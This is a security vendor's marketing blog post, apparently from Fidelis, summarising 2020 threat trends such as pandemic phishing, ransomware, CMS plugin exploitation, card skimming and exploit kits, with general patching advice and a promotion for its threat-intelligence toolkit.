New threat alerts continue to pop up every day. Especially in these unprecedented times, our adversaries exploit current events to disrupt organizations and governments. Since the pandemic began, over 30,000 COVID-19 themed typo-squatting domains were registered within a few months, with the potential for many of these sites to be used for phishing and malware campaigns. In more recent months following a massive work-from-home trend for offices, we began seeing malware like Emotet being sent via phishing emails with return-to-work themed lures.
Be aware of worldwide threats and current events
Cyber criminality threatens the stability of organizations and governments. In critical business verticals like healthcare, transportation, retail and government, threat alerts could cause short-term disruptions. These includes disruptions to supply chain, public service and safety and consumer retail operations. Ransomware activity will persist. We’ve seen it with notable companies like Blackbaud and Garmin paying ransom demands to perpetrators in July 2020. Unfortunately, this may give ransomware operators a boost in their activities.
For months now, Fidelis’s Threat Research Team (TRT) has been monitoring and collecting information on external threats that may pose risks to organizations. Our collection and analysis efforts are driven by criticality, timeliness, and relevance. We have found that we identify emerging vulnerabilities and malware patterns before broader industry coverage. Below are just a few of the more recent threat activities we’ve determined pose a risk to companies. Stay tuned and read more on what we’ve found!
Vulnerabilities in Content Management System Providers
CMS-based webpages like WordPress, Joomla, and Drupal are constantly exploited through vulnerable plugins to upload malicious code or malware like exploit kits. Patching and updates are highly recommended to protect against these campaigns. Our TRT analysts have previously prioritized and reported against high-risk vulnerabilities in popular plugins and platforms.
North Korea’s state-sponsored Lazarus Group (aka: Hidden Cobra) was reported to be involved in a credit card skimming campaign. The malicious code (card skimmer) would be installed on the online payment sites of retailer. Then, the stolen payment data would be funneled through a proxy website. Many of these were observed to be compromised WordPress content management system (CMS) sites that were being used to redistribute the stolen data.
Emerging Vulnerabilities in Popular Software and Services
In our Monthly Threat Intelligence Summary, Fidelis’ TRT provides our customers and external readers a prioritized list of Trending and Emerging vulnerabilities deemed as high-risk to customers in multiple business vertical. TRT also emphasizes keeping watch over older vulnerabilities in popular software from several years ago that continue to be exploited today by malware campaigns and adversaries. This is done through multiple reports detailing vulnerability trends and trending exploit kit activity. Below is a snapshot of a list of Trending vulnerabilities that our TRT analysts have observed being widely exploited and leveraged in malware and cyber-criminal campaigns.
In addition to Trending Vulnerabilities list, our TRT Intelligence team exercises qualitative and properly assessed intelligence forecasting to create a list for Emerging Vulnerabilities. These vulnerabilities may not be as widely covered by media reporting nor exploited as actively as those in the Trending list, but are assessed by our TRT as emerging threats that could post significant risk in the near to medium future. For insight into our Emerging Vulnerabilities lists, please visit our resources website to download the latest versions of our Fidelis TRT Monthly Threat Intelligence Summary.
Increased Activity from Exploit Kits
Over the last 12 months, we’ve observed a constant trend in activity related to exploit kits. While we agree with the standing assessment that exploit kits have yet to come close to their peak in activity seen in 2016 and 2017, we believe that exploit kits today remain a relevant, yet under-reported, threat to individual users and enterprises. Older exploit kits like RIG, Magnitude, and Fallout were updated with newer modules and capabilities. We also saw new variants of this malware type being developed and sporadically surface in campaigns throughout 2019 and 2020.
For example, on 9 July 2020, researchers analyzed a Capesand Exploit Kit (EK) campaign delivering the njRAT malware upon successful exploitation. Capesand EK was observed again on 27 July delivering RaccoonStealer. On 14 July, external researchers identified a sample of Underminer EK delivering an unspecified Trojan using fantasy-sports gambling themed malvertising.
One way to help reduce the risk from exploit kit is to refrain from using Internet Explorer, which is highly leveraged in exploit kit campaigns. You should also ensure browsers and browser plugins are patched and updated regularly.
Espionage Intent Against Biotech and Pharmaceutical Organizations
How can you stay prepared against your company’s known and unknown threat actors?
The Fidelis Threat Research Team has been publishing monthly Threat Intelligence reports. These reports provide a roundup of the latest and emerging threats, breaches, malware, exploit kits and adverse nation-state activities. Our purpose in creating these reports is to provide you (whether you’re a Fidelis customer) with information on external threats which may pose a risk to your organization.
We compiled our recent Threat Intelligence Reports into a Threat Intelligence Toolkit to help security professionals like you in the continued fight against your cyber adversaries. It’s imperative you be aware of and prepared for the threat actors aiming to disrupt your business. Download our toolkit to stay in the loop on all the valuable threat intelligence!